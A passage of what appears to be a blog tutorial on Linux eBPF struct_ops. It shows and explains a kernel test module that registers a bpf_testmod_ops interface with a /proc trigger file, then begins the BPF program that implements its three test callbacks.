            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_2(10, 20) returned: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_3() called with buffer&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"No struct_ops registered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;rcu_read_unlock&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;proc_ops&lt;/span&gt; &lt;span class="n"&gt;trigger_proc_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proc_write&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;trigger_write&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;__init&lt;/span&gt; &lt;span class="nf"&gt;testmod_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Register the struct_ops */&lt;/span&gt;
    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;register_bpf_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_err&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to register struct_ops: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create proc file for triggering */&lt;/span&gt;
    &lt;span class="n"&gt;trigger_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;proc_create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0222&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;trigger_proc_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* Note: No unregister function available in this kernel version */&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;ENOMEM&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod loaded with struct_ops support&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="n"&gt;__exit&lt;/span&gt; &lt;span class="nf"&gt;testmod_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;proc_remove&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="cm"&gt;/* Note: struct_ops unregister happens automatically on module unload */&lt;/span&gt;
    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod unloaded&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;module_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_init&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;module_exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_exit&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;MODULE_LICENSE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_AUTHOR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"eBPF Example"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_DESCRIPTION&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF struct_ops test module"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="n"&gt;MODULE_VERSION&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"1.0"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the Kernel Module Code
&lt;/h3&gt;

&lt;p&gt;This module may seem complex, but its structure is logical and serves a clear purpose: to safely expose a new programmable interface to the BPF subsystem. Let's break it down.&lt;/p&gt;

&lt;p&gt;First, we define the interface itself. &lt;code&gt;struct bpf_testmod_ops&lt;/code&gt; is a plain C struct of function pointers, and it is the interface that our BPF program will implement. Each function pointer defines a "slot" that a BPF program can fill.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, we have the core &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition. This is a special kernel structure that describes our new &lt;code&gt;struct_ops&lt;/code&gt; type to the BPF system. It's the glue that connects our custom &lt;code&gt;bpf_testmod_ops&lt;/code&gt; to the BPF infrastructure.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfi_stubs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"bpf_testmod_ops"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;owner&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;THIS_MODULE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure is filled with callbacks that the kernel will use to manage our &lt;code&gt;struct_ops&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;.reg&lt;/code&gt; and &lt;code&gt;.unreg&lt;/code&gt;: These are the registration and unregistration callbacks. The kernel invokes &lt;code&gt;.reg&lt;/code&gt; when a BPF implementation of &lt;code&gt;bpf_testmod_ops&lt;/code&gt; is attached. Our implementation uses &lt;code&gt;cmpxchg&lt;/code&gt; to ensure that only one implementation can be attached at a time. &lt;code&gt;.unreg&lt;/code&gt; is called when that implementation is detached.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.verifier_ops&lt;/code&gt;: This points to a structure of callbacks for the BPF verifier. It allows us to customize how the verifier treats BPF programs attached to this &lt;code&gt;struct_ops&lt;/code&gt;. For example, we can control which helper functions are allowed. In our case, we use &lt;code&gt;bpf_base_func_proto&lt;/code&gt; to allow a basic set of helpers, including the trace-printk helpers behind the &lt;code&gt;bpf_printk&lt;/code&gt; macro, which is useful for debugging.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.init&lt;/code&gt; and &lt;code&gt;.init_member&lt;/code&gt;: These are for BTF (BPF Type Format) initialization. They are required for the kernel to understand the types and layout of our &lt;code&gt;struct_ops&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.name&lt;/code&gt; and &lt;code&gt;.owner&lt;/code&gt;: These identify our &lt;code&gt;struct_ops&lt;/code&gt; and tie it to our module, ensuring proper reference counting so the module isn't unloaded while a BPF program is still attached.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The module's &lt;code&gt;testmod_init&lt;/code&gt; function is where everything is wired up. It calls &lt;code&gt;register_bpf_struct_ops&lt;/code&gt;, passing our definition together with the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; type. This makes the kernel aware of the new &lt;code&gt;bpf_testmod_ops&lt;/code&gt; type, and from this point on, BPF programs can target it. If registration fails, the error is logged and returned, so the module does not load.&lt;/p&gt;

&lt;p&gt;Finally, to make this demonstrable, the module creates a write-only file (mode &lt;code&gt;0222&lt;/code&gt;) in the proc filesystem: &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt;. When a userspace program writes to this file, the &lt;code&gt;trigger_write&lt;/code&gt; function is called. It copies up to 63 bytes of the written data into a kernel buffer, then reads the module's &lt;code&gt;testmod_ops&lt;/code&gt; pointer to check whether a BPF program has registered an implementation. If so, it calls each function pointer that is set: &lt;code&gt;test_1()&lt;/code&gt;, &lt;code&gt;test_2(10, 20)&lt;/code&gt;, and &lt;code&gt;test_3&lt;/code&gt; with the copied buffer and its length. Each call executes the corresponding code in our BPF program, which gives us a simple way to invoke the BPF-implemented operations from userspace. The pointer is read inside an RCU read-side critical section (&lt;code&gt;rcu_read_lock&lt;/code&gt;, &lt;code&gt;rcu_dereference&lt;/code&gt;), so it can be accessed safely even if it is being updated concurrently.&lt;/p&gt;

&lt;h2&gt;
  
  
  The BPF Program: Implementing the Operations
&lt;/h2&gt;

&lt;p&gt;With the kernel module in place defining the &lt;em&gt;what&lt;/em&gt; (the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; interface), we can now write a BPF program to define the &lt;em&gt;how&lt;/em&gt; (the actual implementation of those operations). This BPF program will contain the logic that executes when the &lt;code&gt;test_1&lt;/code&gt;, &lt;code&gt;test_2&lt;/code&gt;, and &lt;code&gt;test_3&lt;/code&gt; functions are called from the kernel.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: &lt;code&gt;struct_ops.bpf.c&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This program provides the concrete implementations for the function pointers in &lt;code&gt;bpf_testmod_ops&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cm"&gt;/* SPDX-License-Identifier: GPL-2.0 */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"module/bpf_testmod.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Implement the struct_ops callbacks */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_1"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_1 called!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_2"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_2 called: %d + %d = %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_3"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_3 called with buffer length %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Safely read from kernel buffer using bpf_probe_read_kernel */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_probe_read_kernel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="cm"&gt;/* Successfully read buffer - print first few characters */&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Buffer content: '%c%c%c%c'&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Full buffer: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to read buffer, ret=%ld&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
